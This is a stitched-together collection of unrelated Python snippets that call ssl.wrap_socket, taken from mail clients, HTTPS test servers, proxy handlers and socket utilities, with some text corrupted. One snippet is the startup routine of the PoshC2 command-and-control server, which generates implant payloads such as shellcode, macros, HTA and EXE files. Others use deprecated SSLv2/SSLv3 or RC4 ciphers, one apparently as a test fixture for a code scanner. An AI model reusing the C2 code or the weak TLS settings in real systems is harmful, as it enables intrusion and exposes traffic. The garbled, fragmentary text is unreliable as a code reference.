#allow less secure apps import ssl import getpass import base64 #base64 encoding technique from socket import * helloCommand = 'HELO localhost\r\n' endmsg = "\r\n.\r\n" mailserver = 'smtp.gmail.com' clientSocket = socket(AF_INET, SOCK_STREAM) clientSocket = ssl.wrap_socket( clientSocket, #we are creating a secure socket using either ssl or tls ssl_version=ssl.PROTOCOL_SSLv23, ciphers="HIGH:-aNULL:-eNULL:-PSK:RC4-SHA:RC4-MD5", cert_reqs=ssl.CERT_REQUIRED) clientSocket.connect((mailserver, 465)) recvconnect = clientSocket.recv(1024) print recvconnect if recvconnect[:3] != '220': print '220 reply not received from server.' #Send hellocommand and print server response print "Hello Server!" clientSocket.send(helloCommand) recvhelo = clientSocket.recv(1024) print recvhelo if recvhelo[:3] != '250': print '250 reply not received from server.'
import BaseHTTPServer, SimpleHTTPServer import ssl httpd = BaseHTTPServer.HTTPServer(('localhost', 4443), SimpleHTTPServer.SimpleHTTPRequestHandler) httpd.socket = ssl.wrap_socket(httpd.socket, keyfile='../../../../https_test/key.pem', certfile='../../../../https_test/cert.pem', server_side=True) httpd.serve_forever()
recv1 = clientSocket.recv(1024).decode() print(recv1) if recv1[:3] != '250': print('250 reply not received from server.') # Send MAIL FROM command and print server response. command = 'STARTTLS\r\n' clientSocket.send(bytes(command, 'utf-8')) recv11 = clientSocket.recv(1024).decode() if recv11[:3] != '220': print('220 reply not received from server.') #wrappedSocket = ssl.wrap_socket(clientSocket) #, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ADH-AES256-SHA") wrappedSocket = ssl.wrap_socket(clientSocket) #username and password username = input("Enter username: "******"Enter password: "******"AUTH LOGIN\r\n" wrappedSocket.send(bytes(authMsg, 'utf-8')) recv_auth = wrappedSocket.recv(1024) print(recv_auth.decode()) wrappedSocket.send(base64.b64encode(username) + '\r\n'.encode('utf-8')) recv111 = wrappedSocket.recv(1024).decode() print(recv111)
try: with open(ARGS.enroll_secret, "r") as fh: ENROLL_SECRET = fh.read().strip() except IOError as e: print("Cannot read --enroll_secret: %s" % str(e)) exit(1) if not ARGS.persist: signal.signal(signal.SIGALRM, handler) signal.alarm(ARGS.timeout) httpd = HTTPServer(('localhost', ARGS.port), RealSimpleHandler) if ARGS.tls: if 'SSLContext' in vars(ssl): ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) ctx.load_cert_chain(ARGS.cert, keyfile=ARGS.key) ctx.load_verify_locations(capath=ARGS.ca) ctx.options ^= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True) else: httpd.socket = ssl.wrap_socket(httpd.socket, ca_certs=ARGS.ca, ssl_version=ssl.PROTOCOL_SSLv23, certfile=ARGS.cert, keyfile=ARGS.key, server_side=True) debug("Starting TLS/HTTPS server on TCP port: %d" % ARGS.port) else: debug("Starting HTTP server on TCP port: %d" % ARGS.port) httpd.serve_forever()
def http_request(self, req): tmp_ca_cert_path, to_add_ca_cert_path, paths_checked = self.get_ca_certs( ) https_proxy = os.environ.get('https_proxy') context = None if HAS_SSLCONTEXT or HAS_URLLIB3_PYOPENSSLCONTEXT: context = self._make_context(to_add_ca_cert_path) # Detect if 'no_proxy' environment variable is set and if our URL is included use_proxy = self.detect_no_proxy(req.get_full_url()) if not use_proxy: # ignore proxy settings for this host request return req try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if https_proxy: proxy_parts = generic_urlparse(urlparse(https_proxy)) port = proxy_parts.get('port') or 443 s.connect((proxy_parts.get('hostname'), port)) if proxy_parts.get('scheme') == 'http': s.sendall(self.CONNECT_COMMAND % (self.hostname, self.port)) if proxy_parts.get('username'): credentials = "%s:%s" % (proxy_parts.get( 'username', ''), proxy_parts.get('password', '')) s.sendall( b('Proxy-Authorization: Basic %s\r\n') % base64.b64encode( to_bytes( credentials, errors='surrogate_or_strict')).strip()) s.sendall(b('\r\n')) connect_result = b("") while connect_result.find(b("\r\n\r\n")) <= 0: connect_result += s.recv(4096) # 128 kilobytes of headers should be enough for everyone. if len(connect_result) > 131072: raise ProxyError( 'Proxy sent too verbose headers. Only 128KiB allowed.' ) self.validate_proxy_response(connect_result) if context: ssl_s = context.wrap_socket( s, server_hostname=self.hostname) elif HAS_URLLIB3_SSL_WRAP_SOCKET: ssl_s = ssl_wrap_socket(s, ca_certs=tmp_ca_cert_path, cert_reqs=ssl.CERT_REQUIRED, ssl_version=PROTOCOL, server_hostname=self.hostname) else: ssl_s = ssl.wrap_socket(s, ca_certs=tmp_ca_cert_path, cert_reqs=ssl.CERT_REQUIRED, ssl_version=PROTOCOL) match_hostname(ssl_s.getpeercert(), self.hostname) else: raise ProxyError( 'Unsupported proxy scheme: %s. Currently ansible only supports HTTP proxies.' % proxy_parts.get('scheme')) else: s.connect((self.hostname, self.port)) if context: ssl_s = context.wrap_socket(s, server_hostname=self.hostname) elif HAS_URLLIB3_SSL_WRAP_SOCKET: ssl_s = ssl_wrap_socket(s, ca_certs=tmp_ca_cert_path, cert_reqs=ssl.CERT_REQUIRED, ssl_version=PROTOCOL, server_hostname=self.hostname) else: ssl_s = ssl.wrap_socket(s, ca_certs=tmp_ca_cert_path, cert_reqs=ssl.CERT_REQUIRED, ssl_version=PROTOCOL) match_hostname(ssl_s.getpeercert(), self.hostname) # close the ssl connection # ssl_s.unwrap() s.close() except (ssl.SSLError, CertificateError): e = get_exception() build_ssl_validation_error(self.hostname, self.port, paths_checked, e) except socket.error: e = get_exception() raise ConnectionError('Failed to connect to %s at port %s: %s' % (self.hostname, self.port, to_native(e))) try: # cleanup the temp file created, don't worry # if it fails for some reason os.remove(tmp_ca_cert_path) except: pass try: # cleanup the temp file created, don't worry # if it fails for some reason if to_add_ca_cert_path: os.remove(to_add_ca_cert_path) except: pass return req
BAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMREwDwYDVQQHEwhTYW4gSm9zZTEY MBYGA1UEChMPTGFtc29mdHdhcmUgTExDMRQwEgYDVQQDEwtBbkxhbVNlcnZlcjAe Fw0xODA2MDYxNzAxMzNaFw0yODA2MDMxNzAxMzNaMGUxCzAJBgNVBAYTAlVTMRMw EQYDVQQIEwpDYWxpZm9ybmlhMREwDwYDVQQHEwhTYW4gSm9zZTEYMBYGA1UEChMP TGFtc29mdHdhcmUgTExDMRQwEgYDVQQDEwtBbkxhbVNlcnZlcjCBnzANBgkqhkiG 9w0BAQEFAAOBjQAwgYkCgYEAs4wLtICcGA2Cd6jk3UUIOyDliJxr3n8psZjHNkCf 3QH6SaGA3pHKa4h4H8ovnC5l0TECjyeGGmWuaEfJcz4PyWBLbvm/YN1vHxhNGkPR 6aL2e3O4/BN595TdLcyPBliaoUkiBmgebEFOo+7sYguI4Pqlob7okdKKkrVLJxFS 6OUCAwEAAaOByjCBxzAdBgNVHQ4EFgQUss6I1rt+6tkkP6PO6uXuuXw/w0kwgZcG A1UdIwSBjzCBjIAUss6I1rt+6tkkP6PO6uXuuXw/w0mhaaRnMGUxCzAJBgNVBAYT AlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMREwDwYDVQQHEwhTYW4gSm9zZTEYMBYG A1UEChMPTGFtc29mdHdhcmUgTExDMRQwEgYDVQQDEwtBbkxhbVNlcnZlcoIJAP+q BfdY9YykMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADgYEAIPfvzVsLD80f V32+wMrqeygw1SDLNTX0G1132QjD2T4lJqdcTk7wBRfrasvP0SQhVXKXhe0rVrf3 hzj0fRtlETe5Eo9n5VDv8SrQh/Jn1zTq8EEVa86/JF8n049pkZ5E1+OeQnL96qxe FBJVkCRuABu1gYD8P87S/rB0ioO40G8= -----END CERTIFICATE----- """ import http.server import ssl httpd = http.server.HTTPServer(('127.0.0.1', 4443), http.server.SimpleHTTPRequestHandler) httpd.socket = ssl.wrap_socket(httpd.socket, certfile='server.pem', server_side=True) print("started https ...on port 4443") httpd.serve_forever()
def do_POST(self): content_len = int(self.headers.get('content-length', 0)) post_body = self.rfile.read(content_len).decode() request = post_body[1:post_body.find(' ')] self.path = self.path + '&REQUEST_BODY=' + \ post_body.replace('&', '') + '&REQUEST=' + request return self.do_GET() if __name__ == '__main__': server = HTTPServer((QGIS_SERVER_HOST, QGIS_SERVER_PORT), Handler) if https: server.socket = ssl.wrap_socket(server.socket, certfile=QGIS_SERVER_PKI_CERTIFICATE, keyfile=QGIS_SERVER_PKI_KEY, ca_certs=QGIS_SERVER_PKI_AUTHORITY, cert_reqs=ssl.CERT_REQUIRED, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1) print('Starting server on %s://%s:%s, use <Ctrl-C> to stop' % ('https' if https else 'http', QGIS_SERVER_HOST, server.server_port), flush=True) def signal_handler(signal, frame): global qgs_app print("\nExiting QGIS...") qgs_app.exitQgis() sys.exit(0) signal.signal(signal.SIGINT, signal_handler) server.serve_forever()
def _wrap_ssl(self, conn): if self._debug is not None: self._debug('%s: Wrapping socket with SSL' % (self, )) # FIXME: We're losing the SNI stuff here, which is super lame. return ssl.wrap_socket(conn, None, None, ssl_version=self.SSL_VERSION)
required=True, help=('The path to the Redfish Mockup files in ' 'the filesystem')) parser.add_argument('-c', '--ssl-certificate', type=str, help='SSL certificate to use for HTTPS') parser.add_argument('-k', '--ssl-key', type=str, help='SSL key to use for HTTPS') return parser.parse_args() if __name__ == '__main__': args = parse_args() if not os.path.exists(args.mockup_files): print('Mockup files %s not found' % args.mockup_files) sys.exit(1) REDFISH_MOCKUP_FILES = os.path.realpath(args.mockup_files) httpd = http_server.HTTPServer(('', args.port), RequestHandler) if args.ssl_certificate and args.ssl_key: httpd.socket = ssl.wrap_socket(httpd.socket, keyfile=args.ssl_key, certfile=args.ssl_certificate, server_side=True) httpd.serve_forever()
import socket import sys import ssl KEY = '/home/pi/project/SSL_Key_Cert/server.key' CERT = '/home/pi/project/SSL_Key_Cert/server.crt' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creating Socket server_address = ('localhost', 10006) sock.bind(server_address) sock.listen(10) sock_ssl = ssl.wrap_socket(sock, keyfile=KEY, certfile=CERT, server_side=True) print('SSL socket created') print("Server is listening for clients ...") while True: conn, addr = sock_ssl.accept() # Establish connection with client. print 'Got connection from', addr clientuuid = conn.recv(21) print("Client UUID is = %s", clientuuid) vidrecfilename = clientuuid + '_videorectest.h264' with open('/home/pi/project/WSvidrecv//' + vidrecfilename, 'wb+') as f: while True: print("Recieving Data ....") data = conn.recv(3072) if not data: break f.write(data) f.close() print("Successfully Received Video Recording") conn.close()
'AMP-Access-Control-Allow-Source-Origin') self.send_header('AMP-Access-Control-Allow-Source-Origin', 'http://localhost:4000') self.end_headers() # get useful fields from the request fields = cgi.parse_multipart(self.rfile, pdict) first_name = fields.get('First_Name')[0].decode() last_name = fields.get('Last_Name')[0].decode() email_address = fields.get('Email_Address')[0].decode() telephone_number = fields.get('Telephone_Number')[0].decode() json_response = json.dumps({ 'email_address': email_address, 'first_name': first_name, 'last_name': last_name }) self.wfile.write(bytes(json_response, 'utf-8')) print(first_name) mailClient.send(first_name, last_name, email_address, telephone_number) if __name__ == '__main__': port = int(os.environ.get('PORT', 8000)) server_address = ('', port) httpd = ThreadHTTPServer(server_address, EmailResponder) httpd.socket = ssl.wrap_socket(httpd.socket, certfile='/Users/dan/.certs/server.pem', server_side=True) httpd.serve_forever()
logger.error('Bad Path') try: CERTFILE = LOCALPATH + "certs/" + os.environ.get('CERTPATH') + "fullchain.pem" KEYFILE = LOCALPATH + "certs/" + os.environ.get('CERTPATH') + "privkey.pem" if not os.path.isfile(CERTFILE): logger.error("Certfile not found: %s", sys.exc_info()[0]) sys.exit(0) if not os.path.isfile(KEYFILE): logger.error("Keyfile not found: %s", sys.exc_info()[0]) sys.exit(0) httpd = HTTPServer(('', 8888), SimpleHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, keyfile=KEYFILE, certfile=CERTFILE, server_side=True) sa = httpd.socket.getsockname() write_tz() logger.info("Python REST Server") logger.info("Serving HTTPS on port %d", sa[1]) ############################################################################## # Start garage door thread ############################################################################## logger.info("Listening for garage commands") messageListenerThread = threading.Thread(target=garage_listener) messageListenerThread.setDaemon(True) messageListenerThread.start()
def _get_socket(self, host, port, timeout): if self.debuglevel > 0: print>>stderr, 'connect:', (host, port) new_socket = socket.create_connection((host, port), timeout) new_socket = ssl.wrap_socket(new_socket, self.keyfile, self.certfile) self.file = SSLFakeFile(new_socket) return new_socket
def main(args): httpd = ThreadedHTTPServer((BindIP, BindPort), MyHandler) try: if os.name == 'nt': os.system('cls') else: os.system('clear') except Exception: print("cls") print(chr(27) + "[2J") print(Colours.GREEN + logopic) print(Colours.END + "") if os.path.isfile(Database): print(("Using existing project: %s" % PoshProjectDirectory) + Colours.GREEN) database_connect() C2 = get_c2server_all() if ((C2[1] == PayloadCommsHost) and (C2[3] == DomainFrontHeader)): qstart = "%squickstart.txt" % (PoshProjectDirectory) if os.path.exists(qstart): with open(qstart, 'r') as f: print(f.read()) else: print("Error: different IP so regenerating payloads") if os.path.exists("%spayloads_old" % PoshProjectDirectory): import shutil shutil.rmtree("%spayloads_old" % PoshProjectDirectory) os.rename(PayloadsDirectory, "%s:_old" % PoshProjectDirectory) os.makedirs(PayloadsDirectory) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], PayloadCommsHost, DomainFrontHeader, C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) new_urldetails("updated_host", PayloadCommsHost, C2[3], "", "", "", "") update_item("PayloadCommsHost", "C2Server", PayloadCommsHost) update_item("QuickCommand", "C2Server", QuickCommand) update_item("DomainFrontHeader", "C2Server", DomainFrontHeader) newPayload.CreateRaw() newPayload.CreateDlls() newPayload.CreateShellcode() newPayload.CreateSCT() newPayload.CreateHTA() newPayload.CreateCS() newPayload.CreateMacro() newPayload.CreateEXE() newPayload.CreateMsbuild() newPayload.CreatePython() newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt') else: print("Initializing new project folder and database" + Colours.GREEN) print("") directory = os.path.dirname(PoshProjectDirectory) if not os.path.exists(PoshProjectDirectory): os.makedirs(PoshProjectDirectory) if not os.path.exists(DownloadsDirectory): os.makedirs(DownloadsDirectory) if not os.path.exists(ReportsDirectory): os.makedirs(ReportsDirectory) if not os.path.exists(PayloadsDirectory): os.makedirs(PayloadsDirectory) initializedb() if not validate_sleep_time(DefaultSleep): print(Colours.RED) print( "Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h" ) print(Colours.GREEN) sys.exit(1) setupserver(PayloadCommsHost, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, HTTPResponse, PoshProjectDirectory, PayloadCommsPort, QuickCommand, DownloadURI, "", "", "", Sounds, ClockworkSMS_APIKEY, ClockworkSMS_MobileNumbers, URLS, SocksURLS, Insecure, UserAgent, Referrer, Pushover_APIToken, Pushover_APIUser, EnableNotifications) rewriteFile = "%s/rewrite-rules.txt" % directory print("Creating Rewrite Rules in: " + rewriteFile) print("") rewriteHeader = [ "RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1" ] rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules( ) + urlConfig.fetchSocksRewriteRules() with open(rewriteFile, 'w') as outFile: for line in rewriteFileContents: outFile.write(line) outFile.write('\n') outFile.close() C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) new_urldetails("default", C2[1], C2[3], "", "", "", "") newPayload.CreateRaw() newPayload.CreateDlls() newPayload.CreateShellcode() newPayload.CreateSCT() newPayload.CreateHTA() newPayload.CreateCS() newPayload.CreateMacro() newPayload.CreateEXE() newPayload.CreateMsbuild() create_self_signed_cert(PoshProjectDirectory) newPayload.CreatePython() newPayload.WriteQuickstart(directory + '/quickstart.txt') print("") print("CONNECT URL: " + select_item("PayloadCommsHost", "C2Server") + get_newimplanturl() + Colours.GREEN) print("WEBSERVER Log: %swebserver.log" % PoshProjectDirectory) global KEY KEY = get_baseenckey() print("") print(time.asctime() + " PoshC2 Server Started - %s:%s" % (BindIP, BindPort)) from datetime import date, datetime killdate = datetime.strptime(C2[5], '%d/%m/%Y').date() datedifference = number_of_days(date.today(), killdate) if datedifference < 8: print(Colours.RED + ("\nKill Date is - %s - expires in %s days" % (C2[5], datedifference))) else: print(Colours.GREEN + ("\nKill Date is - %s - expires in %s days" % (C2[5], datedifference))) print(Colours.END) protocol = urlparse(PayloadCommsHost).scheme if protocol == 'https': if (os.path.isfile( "%sposh.crt" % PoshProjectDirectory)) and (os.path.isfile( "%sposh.key" % PoshProjectDirectory)): try: httpd.socket = ssl.wrap_socket( httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLS) except Exception: httpd.socket = ssl.wrap_socket( httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1) else: raise ValueError("Cannot find the certificate files") c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True) c2_message_thread.start() try: httpd.serve_forever() except (KeyboardInterrupt, EOFError): httpd.server_close() print(time.asctime() + " PoshC2 Server Stopped - %s:%s" % (BindIP, BindPort)) sys.exit(0)
def wrap_socket(self, sock, **kwargs): return ssl.wrap_socket(sock, keyfile=self._keyfile, certfile=self._certfile, ssl_version=self._protocol, **kwargs)
def connect(self, host): self.sock.connect(host) self.sock = ssl.wrap_socket(self.sock, do_handshake_on_connect=False) self.stream = iostream.SSLIOStream(self.sock)
def main(argv=None): if argv is None: argv = sys.argv title = 'VMAccessServer v0.1.1' os.system("title " + title) sys.stdout = Logger() host = None port = None keyfile = None certfile = None with open('config.cfg', 'r') as cfg: for line in cfg: if line.startswith('host'): host = line.split()[2] elif line.startswith('port'): port = int(line.split()[2]) elif line.startswith('keyfile'): keyfile = line.split('"')[1] elif line.startswith('certfile'): certfile = line.split('"')[1] if (host is not None and port is not None and keyfile is not None and certfile is not None): break if host is None: print('Error occurred: information about host is not found!') return 1 elif port is None: print('Error occurred: information about port is not found!') return 1 elif keyfile is None: print('Error occurred: information about SSL key is not found!') return 1 elif certfile is None: print('Error occurred: information about SSL certfile is not found!') return 1 raw_server = None server = None try: raw_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) except OSError as e: print('Error occurred: failed to set up socket!\r\n%s' %(e)) return 1 try: server = ssl.wrap_socket( raw_server, keyfile=keyfile, certfile=certfile, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1_2, ciphers='AES256-SHA256') except SSLError as e: print('Error occurred: failed to set up SSL!\r\n%s' %(e)) return 1 simultaneous_sessions = 10 max_msg_size = 4096 try: server.bind((host,port)) server.listen(simultaneous_sessions) except OSError as e: print('Error occurred: failed to set up listening port!\r\n%s' %(e)) return 1 input = [server,] pool = PowershellSessionPool() running = True try: while running: try: inputready, outputready, exceptready =\ select.select(input, [], [], 1) except OSError: print('Error occurred: select from active sockets crushed!' '\r\n%s' %(e)) for sock in input: close(sock) return 1 for s in inputready: if s == server: client, address = server.accept() input.append(client) pool.append(client) print ('%sNew client added%s' %(time.strftime("%y.%m.%d/%H:%M:%S - "), str(address))) else: session = pool.find_session(s) data = u_recv(s, max_msg_size) if data: if session.status(): answer = session.manage(data) u_send(s, answer) else: answer = session.authentificate(data) if answer is not None: print ('%sAuthentification successful for ' 'token #%s' %(time.strftime("%y.%m.%d/%H:%M:%S - "), str(data))) u_send(s, answer) else: print ('%sAuthentification failed for token ' '#%s' %(time.strftime("%y.%m.%d/%H:%M:%S - "), str(data))) pool.remove(s) input.remove(s) else: print ('%sToken #%s disconnected' %(time.strftime("%y.%m.%d/%H:%M:%S - "), session.token())) pool.remove(s) input.remove(s) except KeyboardInterrupt as e: print('Keyboard interrupt detected, stopping the server...\n%s' %(e)) finally: for s in input: s.close() return 0
def open_socket(host, port): sock = ssl.wrap_socket(socket(AF_INET, SOCK_DGRAM)) setattr(sock, "ssl_version", sslconnection.PROTOCOL_DTLSv1) sock.connect((host, port)) return sock
import hashlib import binascii import ssl import socket # Using the deprecated ssl.wrap_socket method ssl.wrap_socket(socket.socket(), ssl_version=ssl.PROTOCOL_SSLv2) # Using SSLContext context = ssl.SSLContext(ssl_version=ssl.PROTOCOL_SSLv3) # Using pyOpenSSL from pyOpenSSL import SSL context = SSL.Context(SSL.TLSv1_METHOD) CONFIG_FILE = 'passwords.json' def redirect(args): pass def load_from_config(pass_key, config_file): pass def test_credentials_severity_error_lgtm(request): password = request.GET["password"] # BAD: # Authentication made by comparison to string literal
def connect(self): "Connect to a host on a given (SSL) port." sock = socket.create_connection((self.host, self.port), self.timeout) self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file)
def connect(): connector.connect(('127.0.0.1', port)) ssl.wrap_socket(connector)
def connect(): connector.connect(('127.0.0.1', port)) s = ssl.wrap_socket(connector) s.sendall(b'test_serverssl_makefile2') s.close() connector.close()
def connect_to_datadog(host, port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s = ssl.wrap_socket(s) s.connect((host, port)) return s
def getssldomain(self, threadname, ip): time_begin = time.time() s = None c = None haserror = 1 timeout = 0 domain = None gwsname = "" ssl_orgname = "" try: s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) if g_useOpenSSL: my_ssl_wrap.initsslcxt() s.settimeout(g_conntimeout) s.connect((ip, 443)) c = OpenSSL.SSL.Connection(my_ssl_wrap.ssl_cxt, s) c.set_connect_state() s.setblocking(0) while True: try: c.do_handshake() break except SSLError: infds, outfds, errfds = select.select([ s, ], [], [], g_handshaketimeout) if len(infds) == 0: raise SSLError("do_handshake timed out") else: costtime = int(time.time() - time_begin) if costtime > g_handshaketimeout: raise SSLError("do_handshake timed out") else: pass except OpenSSL.SSL.SysCallError as e: raise SSLError(e.args) time_end = time.time() cert = c.get_peer_certificate() costtime = int(time_end * 1000 - time_begin * 1000) for subject in cert.get_subject().get_components(): if subject[0] == "CN": domain = subject[1] haserror = 0 elif subject[0] == "O": ssl_orgname = subject[1] if domain is None: PRINT("%s can not get CN: %s " % (ip, cert.get_subject().get_components())) if ssl_orgname == "" or ssl_orgname not in g_organizationName: return domain, costtime, timeout, gwsname, ssl_orgname #尝试发送http请求,获取回应头部的Server字段 #if domain is None or isgoolgledomain(domain) == 2: if True: cur_time = time.time() gwsname = self.getgooglesvrname(c, s, ip) time_end = time.time() costtime += int(time_end * 1000 - cur_time * 1000) if domain is None and len(gwsname) > 0: domain = "null" return domain, costtime, timeout, gwsname, ssl_orgname else: s.settimeout(g_conntimeout) c = ssl.wrap_socket(s, cert_reqs=ssl.CERT_REQUIRED, ca_certs=g_cacertfile, do_handshake_on_connect=False) c.settimeout(g_conntimeout) c.connect((ip, 443)) c.settimeout(g_handshaketimeout) c.do_handshake() time_end = time.time() cert = c.getpeercert() costtime = int(time_end * 1000 - time_begin * 1000) if 'subject' in cert: subjectitems = cert['subject'] for mysets in subjectitems: for item in mysets: if item[0] == "commonName": if not isinstance(item[1], str): domain = item[1].encode("utf-8") else: domain = item[1] haserror = 0 elif item[0] == "organizationName": if not isinstance(item[1], str): ssl_orgname = item[1].encode("utf-8") else: ssl_orgname = item[1] if domain is None: PRINT("%s can not get commonName: %s " % (ip, subjectitems)) # 如果组织不在g_organizationName,可能不是google的IP,不能使用 if ssl_orgname == "" or ssl_orgname not in g_organizationName: return domain, costtime, timeout, gwsname, ssl_orgname #尝试发送http请求,获取回应头部的Server字段 #if domain is None or isgoolgledomain(domain) == 2: if True: cur_time = time.time() gwsname = self.getgooglesvrname(c, s, ip) time_end = time.time() costtime += int(time_end * 1000 - cur_time * 1000) if domain is None and len(gwsname) > 0: domain = "null" return domain, costtime, timeout, gwsname, ssl_orgname except SSLError as e: time_end = time.time() costtime = int(time_end * 1000 - time_begin * 1000) if str(e).endswith("timed out"): timeout = 1 else: PRINT("SSL Exception(%s): %s, times:%d ms " % (ip, e, costtime)) return domain, costtime, timeout, gwsname, ssl_orgname except IOError as e: time_end = time.time() costtime = int(time_end * 1000 - time_begin * 1000) if str(e).endswith("timed out"): timeout = 1 else: PRINT("Catch IO Exception(%s): %s, times:%d ms " % (ip, e, costtime)) return domain, costtime, timeout, gwsname, ssl_orgname except Exception as e: time_end = time.time() costtime = int(time_end * 1000 - time_begin * 1000) PRINT("Catch Exception(%s): %s, times:%d ms " % (ip, e, costtime)) return domain, costtime, timeout, gwsname, ssl_orgname finally: if g_useOpenSSL: if c: if haserror == 0: c.shutdown() c.sock_shutdown(2) c.close() if s: s.close() else: if c: if haserror == 0: c.shutdown(2) c.close() elif s: s.close()
import socket import ssl import datetime from localMachineInfo import print_machine_info from server import HOST as SERVER_HOST from server import PORT as SERVER_PORT print("Date and time", datetime.datetime.now()) print_machine_info() HOST = "127.0.0.1" PORT = 60002 client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) client = ssl.wrap_socket(client, keyfile="key.pem", certfile="cert.pem") if __name__ == "__main__": client.bind((HOST, PORT)) client.connect((SERVER_HOST, SERVER_PORT)) while True: from time import sleep client.send("Hello from client!".encode("utf-8")) sleep(1)
data = connstream.read() # null data means the client is finished with us while data: if data: print(data.decode('utf-8')) # we'll assume do_something returns False # when we're finished with client break data = connstream.read() # finished with client connstream.close() cert_name = "myapp1" while True: newsocket, fromaddr = bindsocket.accept() connstream = ssl.wrap_socket( newsocket, server_side=True, certfile="certs/" + cert_name + ".crt", keyfile="certs/" + cert_name + ".key", #certfile="ssl_cert/"+cert_name+".pem", #keyfile="ssl_cert/"+cert_name+".key", # ca_certs="ssl_cert/"+cert_name+".key", cert_reqs=ssl.CERT_REQUIRED, # certfile="/ssl_cert/cert.pem", # keyfile="/ssl_cert/key.pem", ssl_version=ssl.PROTOCOL_TLSv1) deal_with_client(connstream)
def wrap_socket(socket, certfile, keyfile, password=None): """ Wraps an existing TCP socket and returns an SSLSocket object :param socket: The socket to wrap :param certfile: The server certificate file :param keyfile: The server private key file :param password: Password for the private key file (Python >= 3.3) :return: The wrapped socket :raise SSLError: Error wrapping the socket / loading the certificate :raise OSError: A password has been given, but ciphered key files are not supported by the current version of Python """ # Log warnings when some logger = logging.getLogger("ssl_wrap") def _password_support_error(): """ Logs a warning and raises an OSError if a password has been given but Python doesn't support ciphered key files. :raise OSError: If a password has been given """ if password: logger.error("The ssl.wrap_socket() fallback method doesn't " "support key files with a password.") raise OSError("Can't decode the SSL key file: " "this version of Python doesn't support it") try: # Prefer the default context factory, as it will be updated to reflect # security issues (Python >= 2.7.9 and >= 3.4) default_context = ssl.create_default_context() except AttributeError: default_context = None try: # Try to equivalent to create_default_context() in Python 3.5 # Create an SSL context and set its options context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) if default_context is not None: # Copy options context.options = default_context.options else: # Set up the context as create_default_context() does in Python 3.5 # SSLv2 considered harmful # SSLv3 has problematic security context.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 # disallow ciphers with known vulnerabilities context.set_ciphers(_RESTRICTED_SERVER_CIPHERS) try: # Load the certificate, with a password context.load_cert_chain(certfile, keyfile, password) except TypeError: # The "password" argument isn't supported # Check support for key file password _password_support_error() # Load the certificate, without the password argument context.load_cert_chain(certfile, keyfile) # Return the wrapped socket return context.wrap_socket(socket, server_side=True) except AttributeError as ex: # Log a warning to advise the user of possible security holes logger.warning("Can't create a custom SSLContext. " "The server should be considered insecure.") logger.debug("Missing attribute: %s", ex) # Check support for key file password _password_support_error() # Fall back to the "old" wrap_socket method return ssl.wrap_socket( socket, server_side=True, certfile=certfile, keyfile=keyfile)